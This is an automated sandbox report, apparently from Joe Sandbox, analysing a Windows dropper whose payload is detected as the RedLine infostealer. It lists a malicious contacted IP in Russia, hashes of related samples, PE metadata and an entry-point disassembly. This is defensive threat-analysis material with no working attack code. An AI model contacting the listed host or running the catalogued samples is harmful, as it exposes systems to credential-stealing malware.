                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trusttwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbacktwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/06/addressingextwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoortwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsetwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    193.233.20.23
                                                                                                                                                    unknownRussian Federation
                                                                                                                                                    8749REDCOM-ASRedcomKhabarovskRussiaRUtrue
                                                                                                                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                    Analysis ID:815798
                                                                                                                                                    Start date and time:2023-02-27 09:29:18 +01:00
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 10m 52s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:37
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample file name:W7ANVukbbj.exe
                                                                                                                                                    Original Sample Name:093a149ea955420c85d54127e964879a.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/4@0/1
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                                                    HDC Information:
                                                                                                                                                    • Successful, ratio: 28.1% (good quality ratio 27%)
                                                                                                                                                    • Quality average: 85%
                                                                                                                                                    • Quality standard deviation: 24.5%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                                    • Number of executed functions: 134
                                                                                                                                                    • Number of non-executed functions: 66
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Override analysis time to 240s for rundll32
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                    • Execution Graph export aborted for target uPD30tM82.exe, PID 5176 because it is empty
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    09:30:45API Interceptor11x Sleep call for process: twl97yF91.exe modified
                                                                                                                                                    09:31:34API Interceptor27x Sleep call for process: uPD30tM82.exe modified
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    193.233.20.23IBeoz2lT1O.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                      O3m4OQha7t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                        cKulR3hExf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                          j0PvFMsaPX.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                            Qt5NzBQSp3.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                              7B4JTs3B6G.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                9sqZDwVLWx.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                    sPgGBA7Yuf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                      lkpILPqpDR.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                        i2vX2df3mr.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                          07XNY4shKd.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                            rkTCM8bhBN.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            No context
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            REDCOM-ASRedcomKhabarovskRussiaRUIBeoz2lT1O.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            O3m4OQha7t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            cKulR3hExf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            j0PvFMsaPX.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            Qt5NzBQSp3.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            7B4JTs3B6G.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            9sqZDwVLWx.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            sPgGBA7Yuf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            lkpILPqpDR.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            i2vX2df3mr.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            07XNY4shKd.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            rkTCM8bhBN.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 193.233.20.23
                                                                                                                                                                                            No context
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeO3m4OQha7t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              9sqZDwVLWx.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                sPgGBA7Yuf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2843
                                                                                                                                                                                                        Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1V:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtD
                                                                                                                                                                                                        MD5:6EBF0252D03294EB58BEA14A4F15FFEB
                                                                                                                                                                                                        SHA1:785B5C722C8DA926BDAFCCE4D1E496B0107AD1BA
                                                                                                                                                                                                        SHA-256:99B41D21DF3CD6680366E6284BB21214152BF2D0C78DE9CECEA9C55DDDC61101
                                                                                                                                                                                                        SHA-512:FC41C8C88F0C098AB123121D9F0E51F3B8943A4A46F3077D60B7289BD8771CBE4E1680D1A047ECF3FE8E1801C8FEF0E8E356C08DBB915D1ED30939E5EC44DE6B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2843
                                                                                                                                                                                                        Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKAHK1HJ:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxi
                                                                                                                                                                                                        MD5:F10BB43F50AF46B4AFC5C912ABFD63BB
                                                                                                                                                                                                        SHA1:8373E381D926D1023F0F50DE0D29BF8D2027DFDB
                                                                                                                                                                                                        SHA-256:CD9D9A3F7C491DF9BC3C712F9744D73EF40EC517C5223CF39CC10E11E9935720
                                                                                                                                                                                                        SHA-512:D9D04AB860934503D9E890BF8E7527F5B70D202F2371D7BF441FA82FF79CC5A1479A15DBE5C4BA1F52E81C4B7793EDE18E16195407D430BECBDA7E3611AE6958
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\W7ANVukbbj.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):382976
                                                                                                                                                                                                        Entropy (8bit):6.621520064198725
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:G4IyLNAYPyKfsog4gYW9aBKmMagGTFq3W:G5yZAIDEog4FW8gwFq
                                                                                                                                                                                                        MD5:8B79F6A1B67F97CA971CEF540ABF22E7
                                                                                                                                                                                                        SHA1:DB4260EEAB386F0E2414D3605F7424F5AC7E39E7
                                                                                                                                                                                                        SHA-256:F10032D8E8F46511F815FE1AA9B94C8D72D3923E0768E426A513B55CEA07E8E6
                                                                                                                                                                                                        SHA-512:CF584AB63F2089AA2F72C279077A6BDA456771D2C38A24C985BAE0CA33059AF4C5CFDE25441AD1DDA814CF6A9E186F8BC14335D6C5278B1350E674D8F4BE4F67
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 64%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: O3m4OQha7t.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: 9sqZDwVLWx.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: sPgGBA7Yuf.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n.8...k...k...k.]_k...k.]Nk...k.]Xk...k..k...k...kL..k.]Qk...k.]Ok...k.]Jk...kRich...k................PE..L......a......................{......F............@...........................|.....O...........................................P.....{.....................@|.....................................p/..@............................................text...t........................... ..`.data....mz.........................@....rsrc........{.....................@..@.reloc..d_...@|..`...x..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\W7ANVukbbj.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):179317
                                                                                                                                                                                                        Entropy (8bit):4.9493538664698775
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:axqZWXragQx+//Lb/a4de0U9Uha/xNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOr:IqZW/Lb/xqUh
                                                                                                                                                                                                        MD5:763CFA2A099AC8748401DF32FF369ACE
                                                                                                                                                                                                        SHA1:04842B33306B15505A913002A45E4F3E2525A244
                                                                                                                                                                                                        SHA-256:BA0CBEEDCF95B82673048964A69AA10A1D1CFF49E64077D40278C3F7232DB054
                                                                                                                                                                                                        SHA-512:5D292F63E99FB1BFBE01E4986133CFF76939D8E3AB02686BC25E84B0CEB173B6692C2EFFCFF42CBEC8D1951BC0F97AAF8E3E772F417CE753175C47A56FA82E3F
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, Author: ditekSHen
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@.................................8...O.......$............................................................................ ............... ..H............text....... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):7.754380762458114
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:W7ANVukbbj.exe
                                                                                                                                                                                                        File size:450560
                                                                                                                                                                                                        MD5:093a149ea955420c85d54127e964879a
                                                                                                                                                                                                        SHA1:ecef28b8b5ed66fc1226fc0c9e2ce98b89523e76
                                                                                                                                                                                                        SHA256:fd7f4611b78c0f0b264159fcc744604e1a089f9faa381c8e4414a123ff568d19
                                                                                                                                                                                                        SHA512:014a5e43692b423a14cf5c3c53ba1378d3d642b6da52e8c90d7dfd9a526df6c1cc84bb257a6ae05abba917c44ae785420784c906eccd2d12c5641ddce247bffe
                                                                                                                                                                                                        SSDEEP:6144:Kuy+bnr+2p0yN90QEsETKwHHhtW5OSD7N75zZwKWFaBKmMDgGTgBvwXQ0K0980q8:2Mr+y90oQBtgHjNW9gwkvQ38LvlYzN
                                                                                                                                                                                                        TLSH:D4A40107F6FC8132D4B457B01CF202C31A36BDA05A7892D7628FBC5718726B5A23276B
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                                                                                                                                                        Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                        Entrypoint:0x406a60
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:10
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:10
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:10
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        call 00007FEC30B49A25h
                                                                                                                                                                                                        jmp 00007FEC30B49335h
                                                                                                                                                                                                        push 00000058h
                                                                                                                                                                                                        push 004072B8h
                                                                                                                                                                                                        call 00007FEC30B49AC7h
                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                        mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                        lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        call dword ptr [0040A184h]
                                                                                                                                                                                                        mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                        mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                        mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                        mov edi, ebx
                                                                                                                                                                                                        mov edx, 004088ACh
                                                                                                                                                                                                        mov ecx, esi
                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                        lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        je 00007FEC30B4934Ah
                                                                                                                                                                                                        cmp eax, esi
                                                                                                                                                                                                        jne 00007FEC30B49339h
                                                                                                                                                                                                        xor esi, esi
                                                                                                                                                                                                        inc esi
                                                                                                                                                                                                        mov edi, esi
                                                                                                                                                                                                        jmp 00007FEC30B49342h
                                                                                                                                                                                                        push 000003E8h
                                                                                                                                                                                                        call dword ptr [0040A188h]
                                                                                                                                                                                                        jmp 00007FEC30B49309h
                                                                                                                                                                                                        xor esi, esi
                                                                                                                                                                                                        inc esi
                                                                                                                                                                                                        cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                        jne 00007FEC30B4933Ch
                                                                                                                                                                                                        push 0000001Fh
                                                                                                                                                                                                        call 00007FEC30B4985Bh
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        jmp 00007FEC30B4936Ch
                                                                                                                                                                                                        cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                        jne 00007FEC30B4935Eh
                                                                                                                                                                                                        mov dword ptr [004088B0h], esi
                                                                                                                                                                                                        push 004010C4h
                                                                                                                                                                                                        push 004010B8h
                                                                                                                                                                                                        call 00007FEC30B49486h
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        je 00007FEC30B49349h
                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                        mov eax, 000000FFh
                                                                                                                                                                                                        jmp 00007FEC30B49469h
                                                                                                                                                                                                        mov dword ptr [004081E4h], esi
                                                                                                                                                                                                        cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                        jne 00007FEC30B4934Dh
                                                                                                                                                                                                        push 004010B4h
                                                                                                                                                                                                        push 004010ACh
                                                                                                                                                                                                        call 00007FEC30B49A15h
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        mov dword ptr [000088B0h], 00000000h
                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x659a8.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x888.reloc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rsrc0xc0000x660000x65a00False0.9085802967404674data7.808620509312085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .reloc0x720000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                        AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                        RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                        RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                        RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                        RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                        RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                        RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
